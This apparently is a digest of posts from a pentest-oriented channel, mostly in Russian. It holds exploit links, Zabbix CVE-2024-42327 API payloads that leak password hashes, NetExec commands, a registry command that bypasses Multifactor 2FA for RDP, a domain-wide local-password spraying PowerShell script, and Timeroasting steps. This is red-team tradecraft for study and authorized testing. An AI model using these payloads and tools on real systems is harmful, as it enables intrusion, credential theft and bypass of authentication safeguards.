😈 [ drm @lowercase_drm ]

Coffee break thoughts: "is it possible to bruteforce RPC endpoint to perform code exec if you can't access EPM/SMB?"

99% impacket atexec + 1% "for loop" = 100% prod ready
(silent command only)
h/t @saerxcit
🌻

🔗 https://gist.github.com/ThePirateWhoSmellsOfSunflowers/3673746454aef7d55a5efed4dc4e1a61

🐥 [ tweet ]

😈 [ ap @decoder_it ]

OK, I promise to stop spamming about relays with NTLM/Kerberos 😅. But if you're a member of the Distributed COM or Performance Log group, these juicy CLSIDs let you trigger remotely machine authentication of any computer, including DCs, and relay DCOM -> HTTP, SMB:

{9EA82395-E31B-41CA-8DF7-EC1CEE7194DF}
{42C21DF5-FB58-4102-90E9-96A213DC7CE8}
{C63261E4-6052-41FF-B919-496FECF4C4E5}
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744}

🐥 [ tweet ]

CVE-2024-38193: Windows LPE

PATCHED: August 13, 2024

https://github.com/Nephster/CVE-2024-38193

P.S. Протестил на Win11, работает

#git #exploit #lpe #pentest #redteam

CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага.

CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.

Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)

Внутри исходника присутствует аргумент selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.

в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.

Первый этап: Аутентификация через API
Метод user.login используется для получения токена сессии, необходимого для выполнения запросов.

{
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "username": "guest",
        "password": "guest_password"
    },
    "id": 1
}

После этого сервер возвращает токен

{
    "jsonrpc": "2.0",
    "result": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод user.get, перебирай ID пользователей

{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "selectRole": ["roleid, u.passwd", "roleid"],
        "userids": "1"
    },
    "auth": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

В ответе возвращаются данные с хэшированным паролем

{
    "jsonrpc": "2.0",
    "result": [
        {
            "userid": "1",
            "username": "Admin",
            "name": "Zabbix",
            "surname": "Administrator",
            "passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
        }
    ],
    "id": 1
}

Чтобы провернуть эту схему, нужно иметь доступ к JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.

http://zabbix/api_jsonrpc.php

И учетка с минимальными правами, которая может дернуть метод user.login.
Уязвимые версии:

Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.

cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123

PoC

🛠 Как-то незаметно прошел релиз NetExec 1.3.0, а туда тем временем добавили несколько интересных вещей.

Вывод инфы по доступным интерфейсам, так что поиск пивота стал гораздо приятнее.

nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' --interfaces

Проверка на всякие Coerce штуки (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce). Подробнее тут

nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M coerce_plus

Энум SCCM через LDAP (RECON-1) . Подробнее тут

nxc ldap 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M sccm -o REC_RESOLVE=TRUE

Извлечение паролей из истории команд PowerShell

nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M powershell_history -o export=True

Статус Bitlocker по дискам

nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M bitlocker

nxc wmi 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M bitlocker

В общем, есть с чем поиграться. Более подробно можно посмотреть тут или тут

🔥 Вышел Kali Linux 2024.4 – последняя версия этого года.

В обновленной версии добавлены 14 новых инструментов, внесены различные улучшения, а также прекращена поддержка некоторых старых функций.

Выпущена последняя в этом году версия Kali Linux.

В ней представлено 14 новых инструментов, множество улучшений, а также объявлено об отказе от поддержки некоторых устаревших функций.

Данный релиз включает обновление ядра Linux до версии 6.11, GNOME 47, улучшение совместимости с Raspberry Pi, переход на новую версию Python по умолчанию, а также информацию о прекращении выпуска сборок для архитектуры i386.

Решение отказаться от образов для i386 связано с тем, что Debian, на основе которого построена Kali, прекратил поддержку 32-битных сборок в октябре этого года.

Несмотря на это, поскольку 32-битные программы всё ещё могут работать под x86-64, разработчики Offensive Security решили оставить пакеты i386 в дистрибутиве.

Кроме того, в Kali Linux 2024.4 в качестве стандартной версии Python используется 3.12, а использование команды pip для установки пакетов по умолчанию запрещено. Как было объяснено ранее в Offensive Security, выполнение pip с правами root для установки глобальных пакетов может привести к конфликтам с внутренним менеджером пакетов, таким как apt. Для тех, кто хочет использовать аналог pip, в Kali теперь предлагается команда pipx.

Ещё одно важное изменение касается устаревания ключей SSH DSA, так как Kali Linux 2024.4 использует OpenSSH версии 9.8p1. Для пользователей, которым требуется поддержка этих ключей для работы со старыми системами, включён клиент SSH1, который, по словам разработчиков, остаётся на версии 7.5.

Разработчики предупреждают, что инструменты, не знающие команду ssh1, могут столкнуться с проблемами при работе с устаревшими системами, использующими ключи DSA.

Помимо прочего, в новой версии значительно улучшили поддержку Raspberry Pi, добавив утилиту Raspberry Pi Imager. Она помогает найти подходящие образы для Raspberry Pi и легко записать их на карту microSD. В Kali Linux 2024.4 доступен imager для предварительной настройки параметров, которые затем применяются к образу Kali Linux для Raspberry Pi при его записи на microSD.

📌 Скачать

@linuxkalii

Apache Struts2 CVE-2024-53677
*
POC+WriteUp

Всё чаще на проектах встречаю 2FA на критичных серверах , на которые хочется войти именно по RDP, например, Kaspersky Security Center. Наиболее популярное решение, встречаемое мною, это Multifactor. На одном из последних проектов с коллегой мы попали как раз в такую ситуацию - у нас уже были права админа домена, но по RDP не зайти, пришлось искать пути обхода.
А ларчик то просто открывался. Идём на сайт продукта в раздел документации и видим интересный параметр NetworkBypassList. Да, все верно, он определяет с каких ip можно ходить, игнорируя 2FA.
С помощью reg.py можем записать в реестр на нужном сервере исключение и без проблем подключиться игнорируя Multifactor.

reg.py domain.local/pentest@ksc01 -k -no-pass add -keyName 'HKCR\CLSID\{7a6b350e-2fb5-4b07-bcc2-7413ced94def}' -v 'NetworkBypassList' -vt REG_SZ -vd 10.10.10.11,10.10.8.22

Мораль: очень часто не нужны глубокие ресерчи, а просто достаточно почитать документацию :)

Всем привет!

Помимо стандартных компонентов Windows, на системе могут работать службы от сторонних поставщиков: системы слежения, настройки, управления, игрушки. В большинстве своем они также предоставляют опасность, работая от лица NT AUTHORITY\SYSTEM.

Причем, как я понимаю, подобные службы обновляться должны самостоятельно с помощью соответствующего фирменного ПО, что усложняет процесс управления уязвимостями и потенциально дает нам еще один вектор повышения привилегий.

Есть достаточно много способов сбора информации о ПО на системе:

# Извлечение из реестра
Get-ChildItem "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | Get-ItemProperty | Where-Object {$_.DisplayName -ne $null} | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

# wmi
wmic product get name,version,vendor  

# Seatbelt
.\SeatBelt.exe InstalledProducts

Хочу поделиться с вами небольшим списочком уязвимых служб, которые могут помочь взять систему на конечной тачке. Однозначно нужно интегрировать этот список в репозиторий Exploit-Street, но я что-то не могу придумать как. Может быть у вас есть идеи?

ManageEngine ServiceDesk
- https://github.com/horizon3ai/CVE-2021-44077

ManageEngine ADSelfService
- https://github.com/synacktiv/CVE-2021-40539
- CVE-2022-47966
- CVE-XXXX-XXXX (с версии ADSelfService Plus 4.2.9, 2012 и до версии 6.3 Build 6301)

UserManager
- CVE-2023-36047

ITunes
- CVE-2024-44193

Razer ( до 3.7.1209.121307)
- RazerEoP

Datacard XPS Card Printer Driver
- CVE-2024-34329

AppGate
- CVE-2019-19793

Seagate
- CVE-2022-40286

AWS VPN Client
- CVE-2022-25165

AIDA (уязвимы версии ниже 7.00.6742)
- AIDA64DRIVER-EOP

VboxSDS
- CVE-2024-21111

TeamViewer
- CVE-2024-7479 CVE-2024-7481

GamingService от XBOX
- GamingServiceEoP
- GamingServiceEoP5

Chrome Updater
- CVE-2023-7261

Plantronics Desktop Hub
- CVE-2024-27460

Просто новость: в NetExec добавили аутентификацию по сертификату... классно же)

#pentest #soft #ad

😈 [ MrAle98 @MrAle_98 ]

Finally finished to develop an exploit for CVE-2024-49138: vulnerability in CLFS.sys.

I'll provide a detailed analysis in a blog post.

🔗 https://github.com/MrAle98/CVE-2024-49138-POC

🐥 [ tweet ]

[ Microsoft Configuration Manager 2403 Unauthenticated SQL injections ]

https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections

Exploitation code is available at https://github.com/synacktiv/CVE-2024-43468

Проверка локальных учетных записей
Представим себе ситуацию, когда во время выполнения проекта мы обнаружили пароль от локального администратора, например, в групповых политиках, или от другой локальной учетной записи. Нам необходимо проверить на каких хостах эта учетная запись есть и валидна. Если под рукой есть «nxc», то проблем нет, а если нет? Можно воспользоваться PowerShell и написать небольшой скрипт для проверки локальной учетной записи.

Скрипт будет запрашивать в домене все активные хосты с операционной системой Windows и выполнять проверку локальной учетной записи. Метод, используемый в данном скрипте для новых версий Windows, основан на обработке ошибки, это связанно с механизмами безопасности внедренных в операционную систему. Ошибки, возникающие при правильном и неправильном пароле, разные. И на основании этого мы можем делать предположение когда пароль является верным. а когда нет.

function Check-LocalCredential{
    [CmdletBinding()]
    Param (
      [Parameter(Mandatory)]
      [string]
      $UserName,

      [Parameter(Mandatory)]
      [string]
      $Password
    )

    # Подключаем библиотеку для работы с учетными записями
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement -ErrorAction Stop

    # В качестве контекста используем машину
    $ContextType = [DirectoryServices.AccountManagement.ContextType]::Machine

    $searcher = [adsisearcher]'(&(objectCategory=computer)(operatingsystem=*windows*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 1000
    $comps=$searcher.FindAll()
   
    foreach($comp in $comps)
    {
        $ComputerName =  $comp.Properties.dnshostname.Item(0)
        
        try
        {
            $PrincipalContext = [System.DirectoryServices.AccountManagement.PrincipalContext]::new($ContextType, $ComputerName)
            # Проверям учетные данные
            if($PrincipalContext.ValidateCredentials($UserName,$Password))
            {
                Write-Host -ForegroundColor Green "[+] User $UserName has password $Password on computer $ComputerName"
            }
        }
        catch [UnauthorizedAccessException]
        {
        Write-Host -ForegroundColor Yellow "[*] User $UserName has password $Password on computer $ComputerName"
        continue
        }
        catch 
        {
            #Write-host -ForegroundColor Red "[!] Error  $_.Exception.Message "
            continue
        }
    }
}  

Запускаем

Check-LocalCredential -Username Administrator -Password Qwerty123 

Зеленый цвет вывода так же покажет, что учетная запись, от имени которой запускается скрипт, является локальным администратором на проверяемом хосте, желтый - пароль для локальной учетной записи верный.

Стоит помнить, что скрипт проверяет валидность учетных данных, но не показывает членство в группе локальных администраторов.


#Powershell #Внутрянка

Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею.
В двух словах, что такое атака Timeroasting - Это атака, позволяющая получить хеш пароля машинной учетной записи. В целом, мы знаем, что это для нас бесполезно, т.к. пароль машины чаще всего очень длинный и сложный. Но есть сценарии, когда пароль все таки бывает простой и, в совокупности с атакой pre2k, можно построить интересный вектор. Об этом в своем блоге недавно писал @snovvcrash.

Суть атаки Targeted Timeroasting немного в другом: если у нас есть права GenericWrite на объект пользователя, то мы можем превратить этого пользователя в компьютер (что?) и запросить хеш для него. Превратить пользователя в компьютер можно двумя простыми шагами:
1. Меняем userAccountControl на 4096 (UF_WORKSTATION_TRUST_ACCOUNT)
2. Переименовываем sAMAccountName в тоже имя, но со знаком $ на конце
После этих действий сервис времени будет уверен, что это теперь компьютер и отдаст вам хеш.
Хорошо, как можно это использовать?

1 Сценарий.
У нас есть права Domain Admins и не хочется шуметь с помощью атаки DcSync, тогда можно запустить Targeted Timeroasting на всех пользователей и вы получите хеши учеток, которые потом надо будет еще сбрутать.

2 Сценарий.
Захватили учетку HelpDesk. Чаще всего у этой учетки есть права GenericWrite на половину домена. CA в домене нет, значит не провести атаку Shadow Creds. Проведя атаки Targeted Kerberoasting или Targeted AsReproasting мы получим билеты, которые нет возможности побрутить по большим словарям. А с помощью атаки Targeted Timeroasting мы, во-первых, не сильно нашумим на SIEM (не факт, конечно), а во-вторых, получим хеши, которые можно перебирать с чудовещной скоростью.
Остальные сценарии придумайте сами :)

Свежий ресерч про эту атаку вы можете прочитать в блоге. Брутить хеши на hashcat можно так:

git clone https://github.com/hashcat/hashcat && cd hashcat
git checkout 5236f3bd7 && make
./hashcat -m31300

Для атаки Targeted Timeroasting был разработан PowerShell скрипт. Но сегодня я переписал атаку на Python и выложил у себя в репозитории: https://github.com/PShlyundin/TimeSync
Назвал инструмент TimeSync, потому что мне эта атака очень напомнила классический DcSync.

🕸 Mark-of-the-Web Bypass Vulnerability — CVE-2025-0411

This vulnerability (CVSS SCORE 7.0) allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user

All versions before 24.09 are considered vulnerable.

PoC